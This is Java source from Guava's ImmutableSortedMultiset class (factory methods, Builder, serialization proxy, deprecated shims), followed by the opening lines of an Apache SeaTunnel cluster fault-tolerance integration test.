  }

  @IgnoreJRERequirement // helper for toImmutableSortedMultiset
  /*
   * If we make these calls inline inside toImmutableSortedMultiset, we get an Animal Sniffer error,
   * despite the @IgnoreJRERequirement annotation there. My assumption is that, because javac
   * generates a synthetic method for the body of the lambda, the actual method calls that Animal
   * Sniffer is flagging don't appear inside toImmutableSortedMultiset but rather inside that
   * synthetic method. By moving those calls to a named method, we're able to apply
   * @IgnoreJRERequirement somewhere that it will help.
   */
  private static <T extends @Nullable Object, E> void mapAndAdd(
      T t,
      Multiset<E> multiset,
      Function<? super T, ? extends E> elementFunction,
      ToIntFunction<? super T> countFunction) {
    multiset.add(checkNotNull(elementFunction.apply(t)), countFunction.applyAsInt(t));
  }

  /**
   * Returns the empty immutable sorted multiset.
   *
   * <p><b>Performance note:</b> the instance returned is a singleton.
   */
  @SuppressWarnings("unchecked")
  public static <E> ImmutableSortedMultiset<E> of() {
    return (ImmutableSortedMultiset) RegularImmutableSortedMultiset.NATURAL_EMPTY_MULTISET;
  }

  /** Returns an immutable sorted multiset containing a single element. */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1) {
    RegularImmutableSortedSet<E> elementSet =
        (RegularImmutableSortedSet<E>) ImmutableSortedSet.of(e1);
    // Cumulative counts: prefix sums over element counts, so {0, 1} means one element with count 1.
    long[] cumulativeCounts = {0, 1};
    return new RegularImmutableSortedMultiset<>(elementSet, cumulativeCounts, 0, 1);
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any element is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1, E e2) {
    return copyOf(Ordering.natural(), Arrays.asList(e1, e2));
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any element is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(E e1, E e2, E e3) {
    return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3));
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any element is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(
      E e1, E e2, E e3, E e4) {
    return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3, e4));
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any element is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(
      E e1, E e2, E e3, E e4, E e5) {
    return copyOf(Ordering.natural(), Arrays.asList(e1, e2, e3, e4, e5));
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any element is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> of(
      E e1, E e2, E e3, E e4, E e5, E e6, E... remaining) {
    int size = remaining.length + 6;
    List<E> all = Lists.newArrayListWithCapacity(size);
    Collections.addAll(all, e1, e2, e3, e4, e5, e6);
    Collections.addAll(all, remaining);
    return copyOf(Ordering.natural(), all);
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * @throws NullPointerException if any of {@code elements} is null
   */
  public static <E extends Comparable<? super E>> ImmutableSortedMultiset<E> copyOf(E[] elements) {
    return copyOf(Ordering.natural(), Arrays.asList(elements));
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering. To create a copy of a {@code SortedMultiset} that preserves the comparator, call
   * {@link #copyOfSorted} instead. This method iterates over {@code elements} at most once.
   *
   * <p>Note that if {@code s} is a {@code Multiset<String>}, then {@code
   * ImmutableSortedMultiset.copyOf(s)} returns an {@code ImmutableSortedMultiset<String>}
   * containing each of the strings in {@code s}, while {@code ImmutableSortedMultiset.of(s)}
   * returns an {@code ImmutableSortedMultiset<Multiset<String>>} containing one element (the given
   * multiset itself).
   *
   * <p>Despite the method name, this method attempts to avoid actually copying the data when it is
   * safe to do so. The exact circumstances under which a copy will or will not be performed are
   * undocumented and subject to change.
   *
   * <p>This method is not type-safe, as it may be called on elements that are not mutually
   * comparable.
   *
   * @throws ClassCastException if the elements are not mutually comparable
   * @throws NullPointerException if any of {@code elements} is null
   */
  public static <E> ImmutableSortedMultiset<E> copyOf(Iterable<? extends E> elements) {
    // Hack around E not being a subtype of Comparable.
    // Unsafe, see ImmutableSortedMultisetFauxverideShim.
    @SuppressWarnings("unchecked")
    Ordering<E> naturalOrder = (Ordering<E>) Ordering.<Comparable<?>>natural();
    return copyOf(naturalOrder, elements);
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by their natural
   * ordering.
   *
   * <p>This method is not type-safe, as it may be called on elements that are not mutually
   * comparable.
   *
   * @throws ClassCastException if the elements are not mutually comparable
   * @throws NullPointerException if any of {@code elements} is null
   */
  public static <E> ImmutableSortedMultiset<E> copyOf(Iterator<? extends E> elements) {
    // Hack around E not being a subtype of Comparable.
    // Unsafe, see ImmutableSortedMultisetFauxverideShim.
    @SuppressWarnings("unchecked")
    Ordering<E> naturalOrder = (Ordering<E>) Ordering.<Comparable<?>>natural();
    return copyOf(naturalOrder, elements);
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by the given {@code
   * Comparator}.
   *
   * @throws NullPointerException if {@code comparator} or any of {@code elements} is null
   */
  public static <E> ImmutableSortedMultiset<E> copyOf(
      Comparator<? super E> comparator, Iterator<? extends E> elements) {
    checkNotNull(comparator);
    return new Builder<E>(comparator).addAll(elements).build();
  }

  /**
   * Returns an immutable sorted multiset containing the given elements sorted by the given {@code
   * Comparator}. This method iterates over {@code elements} at most once.
   *
   * <p>Despite the method name, this method attempts to avoid actually copying the data when it is
   * safe to do so. The exact circumstances under which a copy will or will not be performed are
   * undocumented and subject to change.
   *
   * @throws NullPointerException if {@code comparator} or any of {@code elements} is null
   */
  public static <E> ImmutableSortedMultiset<E> copyOf(
      Comparator<? super E> comparator, Iterable<? extends E> elements) {
    if (elements instanceof ImmutableSortedMultiset) {
      @SuppressWarnings("unchecked") // immutable collections are always safe for covariant casts
      ImmutableSortedMultiset<E> multiset = (ImmutableSortedMultiset<E>) elements;
      if (comparator.equals(multiset.comparator())) {
        if (multiset.isPartialView()) {
          // A partial view (e.g. a submultiset) may pin a much larger backing structure; copy the
          // entries out so the result is compact.
          return copyOfSortedEntries(comparator, multiset.entrySet().asList());
        } else {
          // Already an immutable sorted multiset with the same comparator: no copy needed.
          return multiset;
        }
      }
    }
    return new ImmutableSortedMultiset.Builder<E>(comparator).addAll(elements).build();
  }

  /**
   * Returns an immutable sorted multiset containing the elements of a sorted multiset, sorted by
   * the same {@code Comparator}. That behavior differs from {@link #copyOf(Iterable)}, which always
   * uses the natural ordering of the elements.
   *
   * <p>Despite the method name, this method attempts to avoid actually copying the data when it is
   * safe to do so. The exact circumstances under which a copy will or will not be performed are
   * undocumented and subject to change.
   *
   * <p>This method is safe to use even when {@code sortedMultiset} is a synchronized or concurrent
   * collection that is currently being modified by another thread.
   *
   * @throws NullPointerException if {@code sortedMultiset} or any of its elements is null
   */
  public static <E> ImmutableSortedMultiset<E> copyOfSorted(SortedMultiset<E> sortedMultiset) {
    // The ArrayList copy is what makes this safe against concurrent modification of the source:
    // we snapshot the entry set before building.
    return copyOfSortedEntries(
        sortedMultiset.comparator(), new ArrayList<>(sortedMultiset.entrySet()));
  }

  /**
   * Builds a RegularImmutableSortedMultiset from entries that are already sorted by {@code
   * comparator} and already deduplicated.
   */
  private static <E> ImmutableSortedMultiset<E> copyOfSortedEntries(
      Comparator<? super E> comparator, Collection<Entry<E>> entries) {
    if (entries.isEmpty()) {
      return emptyMultiset(comparator);
    }
    ImmutableList.Builder<E> elementsBuilder = new ImmutableList.Builder<>(entries.size());
    // cumulativeCounts[i] is the total count of the first i distinct elements, so
    // cumulativeCounts[i + 1] - cumulativeCounts[i] recovers the count of element i.
    long[] cumulativeCounts = new long[entries.size() + 1];
    int i = 0;
    for (Entry<E> entry : entries) {
      elementsBuilder.add(entry.getElement());
      cumulativeCounts[i + 1] = cumulativeCounts[i] + entry.getCount();
      i++;
    }
    return new RegularImmutableSortedMultiset<>(
        new RegularImmutableSortedSet<E>(elementsBuilder.build(), comparator),
        cumulativeCounts,
        0,
        entries.size());
  }

  /**
   * Returns an empty multiset with the given comparator, reusing the natural-order singleton when
   * possible.
   */
  @SuppressWarnings("unchecked")
  static <E> ImmutableSortedMultiset<E> emptyMultiset(Comparator<? super E> comparator) {
    if (Ordering.natural().equals(comparator)) {
      return (ImmutableSortedMultiset<E>) RegularImmutableSortedMultiset.NATURAL_EMPTY_MULTISET;
    } else {
      return new RegularImmutableSortedMultiset<>(comparator);
    }
  }

  ImmutableSortedMultiset() {}

  @Override
  public final Comparator<? super E> comparator() {
    return elementSet().comparator();
  }

  @Override
  public abstract ImmutableSortedSet<E> elementSet();

  // Lazily-computed descending view; @LazyInit documents the racy-but-benign caching idiom
  // (concurrent callers may each compute an instance, but all instances are equivalent).
  @LazyInit transient @Nullable ImmutableSortedMultiset<E> descendingMultiset;

  @Override
  public ImmutableSortedMultiset<E> descendingMultiset() {
    ImmutableSortedMultiset<E> result = descendingMultiset;
    if (result == null) {
      return descendingMultiset =
          this.isEmpty()
              ? emptyMultiset(Ordering.from(comparator()).reverse())
              : new DescendingImmutableSortedMultiset<E>(this);
    }
    return result;
  }

  /**
   * {@inheritDoc}
   *
   * <p>This implementation is guaranteed to throw an {@link UnsupportedOperationException}.
   *
   * @throws UnsupportedOperationException always
   * @deprecated Unsupported operation.
   */
  @CanIgnoreReturnValue
  @Deprecated
  @Override
  @DoNotCall("Always throws UnsupportedOperationException")
  public final @Nullable Entry<E> pollFirstEntry() {
    throw new UnsupportedOperationException();
  }

  /**
   * {@inheritDoc}
   *
   * <p>This implementation is guaranteed to throw an {@link UnsupportedOperationException}.
   *
   * @throws UnsupportedOperationException always
   * @deprecated Unsupported operation.
   */
  @CanIgnoreReturnValue
  @Deprecated
  @Override
  @DoNotCall("Always throws UnsupportedOperationException")
  public final @Nullable Entry<E> pollLastEntry() {
    throw new UnsupportedOperationException();
  }

  @Override
  public abstract ImmutableSortedMultiset<E> headMultiset(E upperBound, BoundType boundType);

  @Override
  public ImmutableSortedMultiset<E> subMultiset(
      E lowerBound, BoundType lowerBoundType, E upperBound, BoundType upperBoundType) {
    checkArgument(
        comparator().compare(lowerBound, upperBound) <= 0,
        "Expected lowerBound <= upperBound but %s > %s",
        lowerBound,
        upperBound);
    // A sub-multiset is the head view of a tail view.
    return tailMultiset(lowerBound, lowerBoundType).headMultiset(upperBound, upperBoundType);
  }

  @Override
  public abstract ImmutableSortedMultiset<E> tailMultiset(E lowerBound, BoundType boundType);

  /**
   * Returns a builder that creates immutable sorted multisets with an explicit comparator. If the
   * comparator has a more general type than the set being generated, such as creating a {@code
   * SortedMultiset<Integer>} with a {@code Comparator<Number>}, use the {@link Builder} constructor
   * instead.
   *
   * @throws NullPointerException if {@code comparator} is null
   */
  public static <E> Builder<E> orderedBy(Comparator<E> comparator) {
    return new Builder<>(comparator);
  }

  /**
   * Returns a builder that creates immutable sorted multisets whose elements are ordered by the
   * reverse of their natural ordering.
   *
   * <p>Note: the type parameter {@code E} extends {@code Comparable<?>} rather than {@code
   * Comparable<? super E>} in order to accommodate users of obsolete javac versions affected by <a
   * href="https://bugs.openjdk.org/browse/JDK-6468354">JDK-6468354</a>.
   */
  public static <E extends Comparable<?>> Builder<E> reverseOrder() {
    return new Builder<>(Ordering.<E>natural().reverse());
  }

  /**
   * Returns a builder that creates immutable sorted multisets whose elements are ordered by their
   * natural ordering. The sorted multisets use {@link Ordering#natural()} as the comparator. This
   * method provides more type-safety than {@link #builder}, as it can be called only for classes
   * that implement {@link Comparable}.
   *
   * <p>Note: the type parameter {@code E} extends {@code Comparable<?>} rather than {@code
   * Comparable<? super E>} in order to accommodate users of obsolete javac versions affected by <a
   * href="https://bugs.openjdk.org/browse/JDK-6468354">JDK-6468354</a>.
   */
  public static <E extends Comparable<?>> Builder<E> naturalOrder() {
    return new Builder<>(Ordering.natural());
  }

  /**
   * A builder for creating immutable multiset instances, especially {@code public static final}
   * multisets ("constant multisets"). Example:
   *
   * {@snippet :
   * public static final ImmutableSortedMultiset<Bean> BEANS =
   *     new ImmutableSortedMultiset.Builder<Bean>(colorComparator())
   *         .addCopies(Bean.COCOA, 4)
   *         .addCopies(Bean.GARDEN, 6)
   *         .addCopies(Bean.RED, 8)
   *         .addCopies(Bean.BLACK_EYED, 10)
   *         .build();
   * }
   *
   * <p>Builder instances can be reused; it is safe to call {@link #build} multiple times to build
   * multiple multisets in series.
   *
   * @since 12.0
   */
  public static class Builder<E> extends ImmutableMultiset.Builder<E> {
    /*
     * We keep an array of elements and counts.  Periodically -- when we need more room in the
     * array, or when we're building, or the like -- we sort, deduplicate, and combine the counts.
     * Negative counts indicate a setCount operation with ~counts[i].
     */

    private final Comparator<? super E> comparator;

    @VisibleForTesting E[] elements;
    // Parallel to elements: counts[i] >= 0 means "add counts[i] copies of elements[i]";
    // counts[i] < 0 means "setCount(elements[i], ~counts[i])" (overwrite, don't accumulate).
    private int[] counts;

    /*
     * The number of used positions in the elements array.  We deduplicate periodically, so this
     * may fluctuate up and down.
     */
    private int length;

    // True if we just called build() and the elements array is being used by a created ISM, meaning
    // we shouldn't modify that array further.
    private boolean forceCopyElements;

    /**
     * Creates a new builder. The returned builder is equivalent to the builder generated by {@link
     * ImmutableSortedMultiset#orderedBy(Comparator)}.
     */
    @SuppressWarnings("unchecked")
    public Builder(Comparator<? super E> comparator) {
      super(true); // doesn't allocate hash table in supertype
      this.comparator = checkNotNull(comparator);
      this.elements = (E[]) new Object[ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY];
      this.counts = new int[ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY];
    }

    /** Check if we need to do deduplication and coalescing, and if so, do it. */
    private void maintenance() {
      if (length == elements.length) {
        dedupAndCoalesce(true);
      } else if (forceCopyElements) {
        // A previously built multiset aliases our elements array; copy before mutating.
        this.elements = Arrays.copyOf(elements, elements.length);
        // we don't currently need to copy the counts array, because we don't use it directly
        // in built ISMs
      }
      forceCopyElements = false;
    }

    /**
     * Sorts the pending (element, count) pairs, merges duplicates, and optionally grows the
     * backing arrays. After this runs, {@code elements[0..length)} are distinct and sorted.
     */
    private void dedupAndCoalesce(boolean maybeExpand) {
      if (length == 0) {
        return;
      }
      E[] sortedElements = Arrays.copyOf(elements, length);
      Arrays.sort(sortedElements, comparator);
      // In-place dedup of the sorted copy: keep the first of each run of comparator-equal elements.
      int uniques = 1;
      for (int i = 1; i < sortedElements.length; i++) {
        if (comparator.compare(sortedElements[uniques - 1], sortedElements[i]) < 0) {
          sortedElements[uniques] = sortedElements[i];
          uniques++;
        }
      }
      // Null out the tail so stale references don't leak.
      Arrays.fill(sortedElements, uniques, length, null);
      if (maybeExpand && uniques * 4 > length * 3) {
        // lots of nonduplicated elements, expand the array by 50%
        sortedElements =
            Arrays.copyOf(sortedElements, IntMath.saturatedAdd(length, length / 2 + 1));
      }
      // Fold each original (element, count) pair into its deduplicated slot. Insertion order is
      // preserved by iterating the original arrays, so a later setCount (negative encoding)
      // overwrites earlier adds, as the API requires.
      int[] sortedCounts = new int[sortedElements.length];
      for (int i = 0; i < length; i++) {
        int index = Arrays.binarySearch(sortedElements, 0, uniques, elements[i], comparator);
        if (counts[i] >= 0) {
          sortedCounts[index] += counts[i];
        } else {
          sortedCounts[index] = ~counts[i];
        }
      }
      // Note that we're not getting rid, yet, of elements with count 0.  We'll do that in build().
      this.elements = sortedElements;
      this.counts = sortedCounts;
      this.length = uniques;
    }

    /**
     * Adds {@code element} to the {@code ImmutableSortedMultiset}.
     *
     * @param element the element to add
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code element} is null
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> add(E element) {
      return addCopies(element, 1);
    }

    /**
     * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}.
     *
     * @param elements the elements to add
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code elements} is null or contains a null element
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> add(E... elements) {
      for (E element : elements) {
        add(element);
      }
      return this;
    }

    /**
     * Adds a number of occurrences of an element to this {@code ImmutableSortedMultiset}.
     *
     * @param element the element to add
     * @param occurrences the number of occurrences of the element to add. May be zero, in which
     *     case no change will be made.
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code element} is null
     * @throws IllegalArgumentException if {@code occurrences} is negative, or if this operation
     *     would result in more than {@link Integer#MAX_VALUE} occurrences of the element
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> addCopies(E element, int occurrences) {
      checkNotNull(element);
      CollectPreconditions.checkNonnegative(occurrences, "occurrences");
      if (occurrences == 0) {
        return this;
      }
      maintenance();
      // Appended as-is; duplicates are merged later by dedupAndCoalesce.
      elements[length] = element;
      counts[length] = occurrences;
      length++;
      return this;
    }

    /**
     * Adds or removes the necessary occurrences of an element such that the element attains the
     * desired count.
     *
     * @param element the element to add or remove occurrences of
     * @param count the desired count of the element in this multiset
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code element} is null
     * @throws IllegalArgumentException if {@code count} is negative
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> setCount(E element, int count) {
      checkNotNull(element);
      CollectPreconditions.checkNonnegative(count, "count");
      maintenance();
      elements[length] = element;
      // ~count (always negative for count >= 0) marks this entry as a setCount, not an add.
      counts[length] = ~count;
      length++;
      return this;
    }

    /**
     * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}.
     *
     * @param elements the {@code Iterable} to add to the {@code ImmutableSortedMultiset}
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code elements} is null or contains a null element
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> addAll(Iterable<? extends E> elements) {
      if (elements instanceof Multiset) {
        // Fast path: add one (element, count) pair per distinct element instead of one per
        // occurrence.
        for (Entry<? extends E> entry : ((Multiset<? extends E>) elements).entrySet()) {
          addCopies(entry.getElement(), entry.getCount());
        }
      } else {
        for (E e : elements) {
          add(e);
        }
      }
      return this;
    }

    /**
     * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}.
     *
     * @param elements the elements to add to the {@code ImmutableSortedMultiset}
     * @return this {@code Builder} object
     * @throws NullPointerException if {@code elements} is null or contains a null element
     */
    @CanIgnoreReturnValue
    @Override
    public Builder<E> addAll(Iterator<? extends E> elements) {
      while (elements.hasNext()) {
        add(elements.next());
      }
      return this;
    }

    /** Final coalescing pass for build(): also drops elements whose resulting count is zero. */
    private void dedupAndCoalesceAndDeleteEmpty() {
      dedupAndCoalesce(false);

      // If there was a setCount(elem, 0), those elements are still present. Eliminate them.
      int size = 0;
      for (int i = 0; i < length; i++) {
        if (counts[i] > 0) {
          elements[size] = elements[i];
          counts[size] = counts[i];
          size++;
        }
      }
      Arrays.fill(elements, size, length, null);
      Arrays.fill(counts, size, length, 0);
      length = size;
    }

    /**
     * Returns a newly-created {@code ImmutableSortedMultiset} based on the contents of the {@code
     * Builder}.
     */
    @Override
    public ImmutableSortedMultiset<E> build() {
      dedupAndCoalesceAndDeleteEmpty();
      if (length == 0) {
        return emptyMultiset(comparator);
      }
      RegularImmutableSortedSet<E> elementSet =
          (RegularImmutableSortedSet<E>) ImmutableSortedSet.construct(comparator, length, elements);
      long[] cumulativeCounts = new long[length + 1];
      for (int i = 0; i < length; i++) {
        cumulativeCounts[i + 1] = cumulativeCounts[i] + counts[i];
      }
      // The built multiset now shares our elements array; maintenance() will copy before any
      // further mutation.
      forceCopyElements = true;
      return new RegularImmutableSortedMultiset<E>(elementSet, cumulativeCounts, 0, length);
    }
  }

  // Serialization proxy (Effective Java pattern): serializes comparator + (element, count) pairs
  // and rebuilds via the Builder on deserialization, so the wire format is independent of the
  // concrete internal representation.
  @J2ktIncompatible // serialization
  private static final class SerializedForm<E> implements Serializable {
    final Comparator<? super E> comparator;
    final E[] elements;
    final int[] counts;

    @SuppressWarnings("unchecked")
    SerializedForm(SortedMultiset<E> multiset) {
      this.comparator = multiset.comparator();
      int n = multiset.entrySet().size();
      elements = (E[]) new Object[n];
      counts = new int[n];
      int i = 0;
      for (Entry<E> entry : multiset.entrySet()) {
        elements[i] = entry.getElement();
        counts[i] = entry.getCount();
        i++;
      }
    }

    Object readResolve() {
      int n = elements.length;
      Builder<E> builder = new Builder<>(comparator);
      for (int i = 0; i < n; i++) {
        builder.addCopies(elements[i], counts[i]);
      }
      return builder.build();
    }
  }

  @Override
  @J2ktIncompatible // serialization
  Object writeReplace() {
    return new SerializedForm<E>(this);
  }

  @J2ktIncompatible // java.io.ObjectInputStream
  private void readObject(ObjectInputStream stream) throws InvalidObjectException {
    // Instances must always be serialized via SerializedForm; direct deserialization is invalid.
    throw new InvalidObjectException("Use SerializedForm");
  }

  /**
   * Not supported. Use {@link #toImmutableSortedMultiset} instead. This method exists only to hide
   * {@link ImmutableMultiset#toImmutableMultiset} from consumers of {@code
   * ImmutableSortedMultiset}.
   *
   * @throws UnsupportedOperationException always
   * @deprecated Use {@link ImmutableSortedMultiset#toImmutableSortedMultiset}.
   * @since 33.2.0 (available since 21.0 in guava-jre)
   */
  @DoNotCall("Use toImmutableSortedMultiset.")
  @Deprecated
  @IgnoreJRERequirement // Users will use this only if they're already using streams.
  public static <E> Collector<E, ?, ImmutableMultiset<E>> toImmutableMultiset() {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. Use {@link #toImmutableSortedMultiset} instead. This method exists only to hide
   * {@link ImmutableMultiset#toImmutableMultiset} from consumers of {@code
   * ImmutableSortedMultiset}.
   *
   * @throws UnsupportedOperationException always
   * @deprecated Use {@link ImmutableSortedMultiset#toImmutableSortedMultiset}.
   * @since 33.2.0 (available since 22.0 in guava-jre)
   */
  @DoNotCall("Use toImmutableSortedMultiset.")
  @Deprecated
  @IgnoreJRERequirement // Users will use this only if they're already using streams.
  public static <T extends @Nullable Object, E>
      Collector<T, ?, ImmutableMultiset<E>> toImmutableMultiset(
          Function<? super T, ? extends E> elementFunction,
          ToIntFunction<? super T> countFunction) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. Use {@link #naturalOrder}, which offers better type-safety, instead. This method
   * exists only to hide {@link ImmutableMultiset#builder} from consumers of {@code
   * ImmutableSortedMultiset}.
   *
   * @throws UnsupportedOperationException always
   * @deprecated Use {@link ImmutableSortedMultiset#naturalOrder}, which offers better type-safety.
   */
  @DoNotCall("Use naturalOrder.")
  @Deprecated
  public static <E> ImmutableSortedMultiset.Builder<E> builder() {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass a parameter of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable)}.</b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable, Comparable)}.</b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1, E e2) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable, Comparable, Comparable)}.</b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable)}. </b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3, E e4) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable, Comparable)} .
   *     </b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3, E e4, E e5) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code
   * Comparable} element.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable, Comparable,
   *     Comparable, Comparable...)} . </b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3, E e4, E e5, E e6, E... remaining) {
    throw new UnsupportedOperationException();
  }

  /**
   * Not supported. <b>You are attempting to create a multiset that may contain non-{@code
   * Comparable} elements.</b> Proper calls will resolve to the version in {@code
   * ImmutableSortedMultiset}, not this dummy version.
   *
   * @throws UnsupportedOperationException always
   * @deprecated <b>Pass parameters of type {@code Comparable} to use {@link
   *     ImmutableSortedMultiset#copyOf(Comparable[])}.</b>
   */
  @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)")
  @Deprecated
  // The usage of "Z" here works around bugs in Javadoc (JDK-8318093) and JDiff.
  public static <Z> ImmutableSortedMultiset<Z> copyOf(Z[] elements) {
    throw new UnsupportedOperationException();
  }

  @J2ktIncompatible private static final long serialVersionUID = 0xdecaf;
}
apache/seatunnel
36,042
seatunnel-e2e/seatunnel-engine-e2e/connector-seatunnel-e2e-base/src/test/java/org/apache/seatunnel/engine/e2e/ClusterFaultToleranceTwoPipelineIT.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.apache.seatunnel.engine.e2e;

import org.apache.seatunnel.common.config.Common;
import org.apache.seatunnel.common.config.DeployMode;
import org.apache.seatunnel.common.constants.JobMode;
import org.apache.seatunnel.common.utils.FileUtils;
import org.apache.seatunnel.engine.client.SeaTunnelClient;
import org.apache.seatunnel.engine.client.job.ClientJobExecutionEnvironment;
import org.apache.seatunnel.engine.client.job.ClientJobProxy;
import org.apache.seatunnel.engine.common.config.ConfigProvider;
import org.apache.seatunnel.engine.common.config.JobConfig;
import org.apache.seatunnel.engine.common.config.SeaTunnelConfig;
import org.apache.seatunnel.engine.common.job.JobStatus;
import org.apache.seatunnel.engine.server.SeaTunnelServerStarter;

import org.awaitility.Awaitility;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Disabled;
import org.junit.jupiter.api.Test;
import org.testcontainers.shaded.org.apache.commons.lang3.tuple.ImmutablePair;

import com.hazelcast.client.config.ClientConfig;
import com.hazelcast.instance.impl.HazelcastInstanceImpl;
import lombok.NonNull;
import lombok.extern.slf4j.Slf4j;

import java.io.File;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.TimeUnit;

import static org.apache.seatunnel.shade.com.google.common.base.Preconditions.checkArgument;

/**
 * Cluster fault tolerance test. Test the job which have two pipelines can recovery capability and
 * data consistency assurance capability in case of cluster node failure
 */
@Slf4j
public class ClusterFaultToleranceTwoPipelineIT {

    // Job config template with two independent pipelines (fake source -> local file sink),
    // instantiated per test case via placeholder substitution below.
    public static final String TEST_TEMPLATE_FILE_NAME =
            "cluster_batch_fake_to_localfile_two_pipeline_template.conf";

    // Placeholder keys replaced in the template when generating a concrete job config file.
    public static final String DYNAMIC_TEST_CASE_NAME = "dynamic_test_case_name";

    public static final String DYNAMIC_JOB_MODE = "dynamic_job_mode";

